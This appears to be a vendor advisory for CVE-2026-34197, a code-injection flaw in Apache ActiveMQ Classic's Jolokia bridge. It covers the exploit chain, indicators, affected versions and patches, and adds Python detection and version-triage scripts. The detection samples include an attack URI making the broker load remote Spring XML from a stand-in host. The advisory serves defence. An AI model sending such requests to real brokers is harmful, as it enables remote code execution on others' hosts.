New in NodeZero®

CVE-2026-34197

Apache ActiveMQ Classic Code Injection

Apache ActiveMQ Classic contains an authenticated remote code execution vulnerability in its Jolokia JMX-HTTP bridge exposed through the web console. The issue affects Apache ActiveMQ Broker before 5.19.4 and from 6.0.0 before 6.2.3. An authenticated attacker can supply a crafted URI to broker management operations, causing the broker to load a malicious remote Spring XML configuration and execute arbitrary code within the JVM.

This vulnerability was discovered by Horizon3.ai and reflects a deeper issue that has effectively existed for over a decade, emerging from the interaction of multiple legitimate features rather than a single coding flaw.

On affected versions where Jolokia is exposed without authentication (CVE-2024-32114), this vulnerability can be exploited without credentials, enabling unauthenticated remote code execution.

Technical Details

CVE-2026-34197 is an authenticated code injection vulnerability in Apache ActiveMQ Classic’s exposure of the Jolokia JMX-HTTP bridge at /api/jolokia/.

The Jolokia endpoint allows execution of MBean operations. By default, it permits exec access to ActiveMQ MBeans, including:

  • BrokerService.addNetworkConnector(String)
  • BrokerService.addConnector(String)

These operations accept a URI as input. An attacker can supply a crafted URI using the xbean: protocol, which causes ActiveMQ to load a remote Spring XML application context.

This exposure stems from prior hardening changes that restricted Jolokia access broadly while allowing unrestricted operations on ActiveMQ MBeans, unintentionally exposing dangerous functionality.


The exploit chain works as follows:

  • The attacker invokes addNetworkConnector through Jolokia
  • A crafted vm:// URI is supplied with brokerConfig=xbean:http://...
  • ActiveMQ attempts to create a broker using the attacker-controlled configuration
  • Spring loads the remote XML and instantiates beans
  • Malicious beans invoke Java methods such as Runtime.exec()

The result is arbitrary code execution as the ActiveMQ service user.

This vulnerability becomes significantly more dangerous when combined with:

  • Weak or default web console credentials (commonly admin:admin)
  • Exposed Jolokia endpoints
  • CVE-2024-32114, which removes authentication requirements entirely on some versions

An attacker who reaches the web console can move directly to code execution and full host compromise.

NodeZero® Proactive Security Platform — Rapid Response

A Rapid Response test for CVE-2026-34197 enables organizations to quickly validate whether their Apache ActiveMQ Classic environment is actually exploitable.

  • Run the Rapid Response test: Launch the test from the NodeZero platform to determine whether an attacker can execute this path in your environment
  • Patch immediately: Upgrade to fixed versions and restrict exposure of the web console and Jolokia endpoints
  • Re-run the Rapid Response test: Validate that remediation actions have eliminated the exploit path

Version checks don’t tell you if you’re exposed. This test does.

Indicators of Compromise

At the time of publication, no vendor-provided indicators of compromise have been released. However, exploitation leaves clear and high-signal traces.

  • /api/jolokia/ requests (HTTP activity): Suspicious POST requests invoking exec operations on ActiveMQ MBeans
  • addNetworkConnector usage (Application behavior): Invocation with unexpected or external URIs
  • vm://...brokerConfig=xbean:http:// (Log artifact): Strong indicator of an exploitation attempt loading remote Spring XML
  • Outbound HTTP requests (Network activity): Connections from the broker to attacker-controlled infrastructure
  • Unexpected process execution (Host behavior): Child processes spawned by the ActiveMQ Java process

Note: Code execution occurs during the connection attempt. Error or failure messages in logs may appear after the payload has already executed.
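The following detection logic is an added example written for this advisory; it is not Horizon3.ai's code and not part of NodeZero. It turns the indicators above into two checks: one classifies individual Jolokia HTTP requests (Jolokia exec requests are JSON documents with `type`, `mbean`, `operation` and `arguments` fields, and bulk requests are a JSON list), flagging exec calls on ActiveMQ MBeans, escalating for the connector operations named above, and escalating again when any argument carries an xbean: URI with a remote scheme; the other scans broker log lines for the same remote-xbean artifact. All request bodies, hostnames and log lines are constructed samples, and the log format is a placeholder rather than ActiveMQ's actual layout.

```python
"""Detection logic for the CVE-2026-34197 exploit path over Jolokia (added example)."""
import json
import re
from urllib.parse import unquote

# Broker management operations the advisory names as reachable through Jolokia exec.
DANGEROUS_OPERATIONS = {"addNetworkConnector", "addConnector"}

# An xbean: URI pointing at a remote scheme is the signature of the broker being
# asked to load a remote Spring XML context.
REMOTE_XBEAN = re.compile(r"xbean:(?:https?|ftp)://", re.IGNORECASE)

SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}


def classify_jolokia_request(path, body):
    """Return the most severe finding for one Jolokia HTTP request, or None.

    `path` is the request path and `body` the raw JSON POST body. Jolokia bulk
    requests are a JSON list, so a single request is normalised to a list.
    """
    if not path.startswith("/api/jolokia"):
        return None
    try:
        payload = json.loads(body)
    except ValueError:
        return None
    requests = payload if isinstance(payload, list) else [payload]
    worst = None
    for req in requests:
        if not isinstance(req, dict) or req.get("type") != "exec":
            continue
        # Jolokia accepts "operation(java.lang.String)" overload syntax; keep the bare name.
        op_name = str(req.get("operation", "")).split("(", 1)[0]
        mbean = str(req.get("mbean", ""))
        args = [unquote(str(a)) for a in req.get("arguments") or []]
        if any(REMOTE_XBEAN.search(a) for a in args):
            severity, reason = "critical", "remote xbean: URI passed to an exec operation"
        elif op_name in DANGEROUS_OPERATIONS:
            severity, reason = "high", "exec of a broker connector operation"
        elif mbean.startswith("org.apache.activemq:"):
            severity, reason = "medium", "exec on an ActiveMQ MBean"
        else:
            continue
        finding = {"severity": severity, "reason": reason,
                   "mbean": mbean, "operation": op_name, "arguments": args}
        if worst is None or SEVERITY_RANK[severity] > SEVERITY_RANK[worst["severity"]]:
            worst = finding
    return worst


def scan_broker_log(lines):
    """Return (line_number, line) pairs carrying the remote-xbean log artifact."""
    return [(n, line) for n, line in enumerate(lines, start=1) if REMOTE_XBEAN.search(line)]


BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"

# Constructed sample requests (path, body); none of this is captured traffic.
SAMPLE_REQUESTS = [
    ("/api/jolokia/", json.dumps({"type": "read", "mbean": BROKER,
                                  "attribute": "TotalConsumerCount"})),
    ("/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER,
                                  "operation": "addNetworkConnector(java.lang.String)",
                                  "arguments": ["vm://broker?brokerConfig=xbean:http://198.51.100.7/ctx.xml"]})),
    ("/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER,
                                  "operation": "addConnector",
                                  "arguments": ["tcp://0.0.0.0:61617"]})),
    ("/admin/queues.jsp", ""),
]

# Constructed log lines in a placeholder format (not ActiveMQ's real log layout).
SAMPLE_LOG = [
    "INFO  | Broker localhost started",
    "INFO  | Establishing network connection vm://broker?brokerConfig=xbean:http://198.51.100.7/ctx.xml",
    "WARN  | Network bridge could not be established",
]

if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        print(path, classify_jolokia_request(path, body))
    for n, line in scan_broker_log(SAMPLE_LOG):
        print(f"log line {n}: {line}")
```

The "high" tier exists because, as the page notes, code execution happens during the connection attempt: any exec of addNetworkConnector or addConnector from outside the normal administration path is worth an alert even when the argument does not obviously reference a remote xbean: context, and the critical tier should page someone immediately.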

Affected versions & patch

Affected:

  • Apache ActiveMQ Broker before 5.19.4
  • Apache ActiveMQ Broker from 6.0.0 before 6.2.3
  • Apache ActiveMQ activemq-all before 5.19.4
  • Apache ActiveMQ activemq-all from 6.0.0 before 6.2.3

Patch:

  • Upgrade to Apache ActiveMQ Classic 5.19.4 or 6.2.3 or later

The patch removes the ability for addNetworkConnector to instantiate vm:// transports, eliminating the code execution path.
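As an added example, not code from Horizon3.ai or the ActiveMQ project, the script below encodes the affected ranges listed above and sorts an inventory of broker versions into affected, fixed and unparseable buckets. It is a triage aid for deciding where to look first, not proof of exposure, which the page points out a version check cannot give. The hostnames and version strings are constructed placeholders; the version parser assumes a leading major.minor.patch triple and ignores vendor suffixes.

```python
"""Inventory triage against the CVE-2026-34197 affected ranges (added example)."""
import re

# Affected ranges as stated in the advisory: (inclusive lower bound, exclusive upper bound).
# A lower bound of None means every version below the upper bound.
AFFECTED_RANGES = [
    (None, (5, 19, 4)),       # Apache ActiveMQ Broker / activemq-all before 5.19.4
    ((6, 0, 0), (6, 2, 3)),   # from 6.0.0 before 6.2.3
]

# Leading numeric triple; suffixes such as "-SNAPSHOT" or ".redhat-00001" are ignored.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) for strings like '5.18.3' or '6.2.3-SNAPSHOT'."""
    m = VERSION_RE.match(text.strip())
    if m is None:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version_text):
    """True when the version falls inside one of the advisory's affected ranges."""
    v = parse_version(version_text)
    return any((lower is None or v >= lower) and v < upper
               for lower, upper in AFFECTED_RANGES)


def triage(inventory):
    """Split (host, version) pairs into affected, fixed and unknown buckets."""
    result = {"affected": [], "fixed": [], "unknown": []}
    for host, version in inventory:
        try:
            bucket = "affected" if is_affected(version) else "fixed"
        except ValueError:
            bucket = "unknown"
        result[bucket].append((host, version))
    return result


# Constructed inventory; hostnames and versions are placeholders, not real assets.
SAMPLE_INVENTORY = [
    ("mq-prod-01.example.internal", "5.18.3"),
    ("mq-prod-02.example.internal", "5.19.4"),
    ("mq-dev-01.example.internal", "6.1.2"),
    ("mq-dev-02.example.internal", "6.2.3"),
    ("mq-legacy.example.internal", "5.19.3.redhat-00002"),
    ("mq-unknown.example.internal", "unknown"),
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(bucket)
        for host, version in hosts:
            print(f"  {host:<32} {version}")
```

Hosts in the "unknown" bucket still need a manual check; a version string the parser cannot read is a reason to look harder, not to deprioritise.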

Interim mitigation:

  • Restrict access to the ActiveMQ web console to trusted networks only
  • Disable or tightly control access to the Jolokia JMX-HTTP bridge
  • Remove default credentials and enforce strong authentication
  • Limit which users can invoke broker management operations

Timeline

  • March 22, 2026: Horizon3.ai reports the vulnerability to Apache
  • March 26, 2026: Apache ActiveMQ team acknowledges the report and assigns CVE-2026-34197
  • March 30, 2026: Apache releases ActiveMQ Classic version 6.2.3 with a fix
  • April 6, 2026: Apache publishes the security advisory for CVE-2026-34197
  • April 7, 2026: CVE-2026-34197 is published publicly
